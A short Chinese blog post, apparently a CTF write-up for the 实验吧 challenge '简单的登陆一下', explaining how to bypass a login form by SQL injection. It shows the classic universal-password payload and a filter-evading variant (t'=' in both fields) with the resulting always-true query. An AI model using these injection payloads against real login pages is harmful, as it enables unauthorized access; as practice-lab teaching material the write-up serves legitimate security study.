美文网首页
实验吧 简单的登陆一下

实验吧 简单的登陆一下

作者: so_8925 | 来源:发表于2019-06-22 17:33 被阅读0次

    拿到题目第一反应是SQL注入题,但是却找不到注入点,根据题目的意思,我们万能密码('or 1=1 or '1)登入一下

    发现or已经被过滤掉了,换成大写也是这样

    然后就开始想自己构造绕语句

    sql查询语句: select ,,, from ,,, where username='   ' and password='  ';

    构造username=t'=' password=t'='

    分析:select ,,, from ,,, where username='t'=' 'and password='t'='';这是一个永真的式子。

    所以我们登录的

    username:t'='

    密码为t'='

    相关文章

      网友评论

          本文标题:实验吧 简单的登陆一下

          本文链接:https://www.haomeiwen.com/subject/ufyvqctx.html